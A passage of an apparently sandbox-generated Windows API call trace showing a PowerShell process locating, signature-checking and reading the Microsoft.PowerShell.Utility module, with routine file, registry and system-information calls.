lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x64 [0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x64, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0089.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebda74) returned 1 [0089.296] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x4ebdd38 | out: lpFileInformation=0x4ebdd38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebda70) returned 1 [0089.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.297] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4ebda04, nSize=0xbc | out: lpBuffer="") returned 0x95 [0089.300] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\5alr3u30d3\\documents\\windowspowershell\\modules")) returned 0xffffffff [0089.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0089.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0089.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x51, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0089.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd87c) returned 1 [0089.308] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebdb40 | out: lpFileInformation=0x4ebdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd878) returned 1 [0089.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.314] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0089.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0089.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x59, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0089.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd87c) returned 1 [0089.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebdb40 | out: lpFileInformation=0x4ebdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd878) returned 1 [0089.319] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0090.246] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0090.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.247] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebd8a0, Length=0x20, ResultLength=0x4ebd910 | out: SystemInformation=0x4ebd8a0, ResultLength=0x4ebd910*=0x0) returned 0xc0000003 [0090.247] GetSystemInfo (in: lpSystemInfo=0x4ebd91c | out: lpSystemInfo=0x4ebd91c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0090.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebd8ac | out: phkResult=0x4ebd8ac*=0x4d8) returned 0x0 [0090.248] RegQueryValueExW (in: hKey=0x4d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebd8c8, lpData=0x0, lpcbData=0x4ebd8c4*=0x0 | out: lpType=0x4ebd8c8*=0x0, lpData=0x0, lpcbData=0x4ebd8c4*=0x0) returned 0x2 [0090.248] RegCloseKey (hKey=0x4d8) returned 0x0 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd650) returned 1 [0090.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x637d658 | out: lpFileInformation=0x637d658*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd64c) returned 1 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd610) returned 1 [0090.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd8d4 | out: lpFileInformation=0x4ebd8d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd60c) returned 1 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd5a4) returned 1 [0090.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd868 | out: lpFileInformation=0x4ebd868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd5a0) returned 1 [0090.249] CoTaskMemAlloc (cb=0x10) returned 0x425e9a0 [0090.249] CoTaskMemAlloc (cb=0x10) returned 0x425e5c8 [0090.250] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0090.250] CoTaskMemAlloc (cb=0x30) returned 0x42484d0 [0090.250] WinVerifyTrust () returned 0x800b0100 [0090.267] CoTaskMemFree (pv=0x425e9a0) [0090.267] CoTaskMemFree (pv=0x42484d0) [0090.267] CryptCATHandleFromStore () returned 0x2bfda8 [0090.267] WTHelperGetProvSignerFromChain () returned 0x0 [0090.267] CoTaskMemAlloc (cb=0x10) returned 0x425e9a0 [0090.267] CoTaskMemAlloc (cb=0x30) returned 0x42484d0 [0090.267] WinVerifyTrust () returned 0x0 [0090.267] CoTaskMemFree (pv=0x42484d0) [0090.267] CoTaskMemFree (pv=0x425e9a0) [0090.267] CoTaskMemFree (pv=0x33cef8) [0090.267] CoTaskMemFree (pv=0x425e5c8) [0090.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd85c) returned 1 [0090.268] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d8 [0090.269] GetFileType (hFile=0x4d8) returned 0x1 [0090.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd858) returned 1 [0090.269] GetFileType (hFile=0x4d8) returned 0x1 [0090.269] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x0 [0090.269] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.270] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x1000 [0090.270] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.270] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x2000 [0090.270] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.271] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x3000 [0090.271] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.271] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x4000 [0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.272] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x5000 [0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.272] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x6000 [0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7000 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x778, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7778 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637e578, nNumberOfBytesToRead=0x88, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637e578*, lpNumberOfBytesRead=0x4ebd8c4*=0x0, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7778 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x0, lpOverlapped=0x0) returned 1 [0090.274] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebd82c, Length=0x20, ResultLength=0x4ebd89c | out: SystemInformation=0x4ebd82c, ResultLength=0x4ebd89c*=0x0) returned 0xc0000003 [0090.274] GetSystemInfo (in: lpSystemInfo=0x4ebd8a8 | out: lpSystemInfo=0x4ebd8a8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0090.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebd838 | out: phkResult=0x4ebd838*=0x500) returned 0x0 [0090.275] RegQueryValueExW (in: hKey=0x500, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebd854, lpData=0x0, lpcbData=0x4ebd850*=0x0 | out: lpType=0x4ebd854*=0x0, lpData=0x0, lpcbData=0x4ebd850*=0x0) returned 0x2 [0090.275] RegCloseKey (hKey=0x500) returned 0x0 [0090.275] CloseHandle (hObject=0x4d8) returned 1 [0090.556] CoCreateGuid (in: pguid=0x4ebd96c | out: pguid=0x4ebd96c*(Data1=0xa7c3fb1, Data2=0x7181, Data3=0x4477, Data4=([0]=0xb3, [1]=0x98, [2]=0x9b, [3]=0x5e, [4]=0xa6, [5]=0xd4, [6]=0xcf, [7]=0x15))) returned 0x0 [0090.556] GetCurrentProcess () returned 0xffffffff [0090.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebd938 | out: TokenHandle=0x4ebd938*=0x500) returned 1 [0090.557] GetTokenInformation (in: TokenHandle=0x500, 